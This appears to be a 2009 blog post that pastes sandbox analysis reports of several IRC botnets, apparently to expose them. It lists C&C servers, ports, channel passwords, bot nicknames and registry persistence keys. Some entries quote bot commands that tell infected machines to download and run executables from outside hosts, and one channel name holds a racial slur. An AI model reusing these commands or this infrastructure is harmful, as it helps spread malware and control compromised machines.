Month: October 2009

Secret.Virus.Gov(ogard from unkn0wn.ws 23k net dci bot)

Remote Host Port Number174.143.212.148 666766.45.237.212 80 * The data identified by the following URL was then requested from the remote web server: o http://accf0ur.t35.com/03.jpeg NICK VirUs-oqgsnaxaUSER VirUs “” “mqo” :8Coded8VirUs..JOIN #OgarD3# VirusPRIVMSG #OgarD3# :Success. PASS Virus Registry Modifications * The following Registry Key was created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{67KLN5J0-4OPM-61WE-AAX2-5657QWE232788} * The newly created Registry Value

61.139.151.20

Remote Host Port Number61.139.151.20 6697 MODE MetroP-XP820JOIN #putasPONG bitches.teibol.comNICK MetroP-XP820USER USA63600 * 0 :COMPUTERNAME PASS msnfuck Other details * The following port was open in the system: Port Protocol Process1052 TCP iexplore.exe (%System%iexplore.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Internet Explorer = “iexplore.exe” so that iexplore.exe runs every

sip4.voipkosovasite.com

Unknown ConnectionsHost By Name:Requested Host: home-off-d5f0acResulting Address: 172.16.2.61Requested Host: sip4.voipkosovasite.comResulting Address: 82.114.87.46Connection Established: 0Socket: 0Outgoing ConnectionsIRC DataUser Name: XP-5101Host Name: *Server Name: Real Name: HOME-OFF-D5F0ACNick Name: [00|USA|169352]Non RFC Conform: 1ChannelName: #!a!Topic Deleted: :.msn.stop|.msn.msg foto? http://xhena.xh.ohost.de/viewimage.php?=Private Message DeletedValue: :d-!auth@barki.com PRIVMSG [00|USA|169352] :.login mamajokero -sValue: :d-!auth@barki.com PRIVMSG [00|USA|169352] :.r.getfile http://82.114.87.46/set.jpg c:/sd.exe 1 -sNotice Message DeletedValue: :irc.priv8net.com NOTICE

92.241.164.197

Remote Host Port Number92.241.164.197 8877 NICK ENGLISH|COMPUTERNAME|241NICK ENGLISH|COMPUTERNAME|162USER ENGLISH|COMPUTERNAME|162 0 * :Hoooooly 67893PONG 781430258JOIN #freeUSER ENGLISH|COMPUTERNAME|241 0 * :Hoooooly 88723PONG 653356001PING primax.besecure.biz Other details The following ports were open in the system:Port Protocol Process1052 TCP reg32.exe (%System%reg32.exe)1053 TCP reg32.exe (%System%reg32.exe)1054 TCP reg32.exe (%System%reg32.exe Registry Modifications The following Registry Keys were created:HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_SECULAYHKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_SECULAY000HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_SECULAY000ControlHKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSecuLayHKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSecuLaySecurityHKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSecuLayEnumHKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_SECULAYHKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_SECULAY000HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_SECULAY000ControlHKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSecuLayHKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSecuLaySecurityHKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSecuLayEnumThe newly created Registry Values

login.ipwhois.org.uk(very big botnet)

5.c) windows7addon.exe – Network Activity – DNS Queries: Name Query Type Query Result Successful Protocol login.ipwhois.org.uk DNS_TYPE_A 111.68.19.104 1 login.ipwhois.co.uk DNS_TYPE_A 111.68.19.104 1 www.pr0.net DNS_TYPE_A 64.59.116.150 1 – IRC Conversations: 111.68.19.104:47221 Nick: [00_AUT_XP_1270214]Username: SP3-601Joined Channel: #russiChannel Topic for Channel #russi: “.asc -S -s|.http http://privcash.cc/10.exe|.asc exp_all 15 5 0 -a -r -e -s|.asc exp_all 20 5

srv1.manage-your-box.ru(baadshaah lamer big net)

DNS LookupHost Name IP Addresssrv1.manage-your-box.ru 216.246.77.66rapidshare.com rapidshare.com 195.122.131.4rs716tg.rapidshare.com rs716tg.rapidshare.com 80.231.31.117Download URLshttp://195.122.131.4/files/298437914/81 (rapidshare.com)http://80.231.31.117/files/298437914/81 (rs716tg.rapidshare.com) * C&C Server: 216.246.77.66:1863 * Server Password: * Username: SPX * Nickname: N|DEU|0|XP|092652263 * Channel: #mix# (Password: ####) * Channeltopic: :8FEB48668E75185DB32D7D0B65D097F592B1C267FE416DF5E91C4DF84E6F6944306D807B4E8C1F5699261CC7FBCCD9D24E6CFF98134A2134D08B47A87849D7FC0C7B Outgoing connection to remote server: rapidshare.com TCP port 80Outgoing connection to remote server: rs716tg.rapidshare.com TCP port 80DNS LookupHost Name IP Addressdell-d3e62f7e26

irc.ie.hotgate.eu

Remote Host Port Number79.125.12.23 6667 NICK |POP|942165|1|en-US|USER |POP|942165|1|en-US| |POP|942165|1|en-US| |POP|942165|1|en-US| |POP|942165|1|en-US|JOIN #archer niggerPING :archer.no-ip.org Invisible Users: 489Operators: 13 operator(s) onlineChannels: 38 channels formedClients: I have 509 clients and 1 serversLocal users: Current Local Users: 509 Max: 673Global users: Current Global Users: 520 Max: 682 File System Modifications * The following files were created in the

DUBAI.ladroes.gov

Invisible Users: 52Operators: 1 operator(s) onlineChannels: 4 channels formedClients: I have 53 clients and 0 serversLocal users: Current Local Users: 53 Max: 104Global users: Current Global Users: 53 Max: 88 189.74.8.98 :6667 chanels #win,#system

ns2.mm1-shop.net

# Winsock Section… * Unknown Connections o Host By Name: + Requested Host: ns2.mm1-shop.net + Resulting Address: 46.3.96.231 o Connection Established: 0 o Socket: 0 * UDP connections_listening o Transport Protocol: TCP o Local Port: 47154 o Connection Established: 0 o Socket: 1296 * Outgoing Connections o Transport Protocol: TCP o Remote Address: 87.118.112.244 o

88.255.120.47

Remote Host Port Number88.255.120.47 6667 NICK aynur|CamUSER Bahar11 “Cod” “timu.gadarlar.net” :aLeynaNICK kontroLUSER aynur1 “Cod” “timu.gadarlar.net” :melekUSERHOST aynur|CamMODE #Security#JOIN #!! birtanemMODE aynur|Cam +iMODE #!PRIVMSG #!! :ben geldimNICK Aysun883 * The following ports were open in the system: Port Protocol Process113 TCP caves.exe (%System%caves.exe)1052 TCP caves.exe (%System%caves.exe)1053 TCP caves.exe (%System%caves.exe)1054 TCP caves.exe (%System%caves.exe) Registry Modifications * The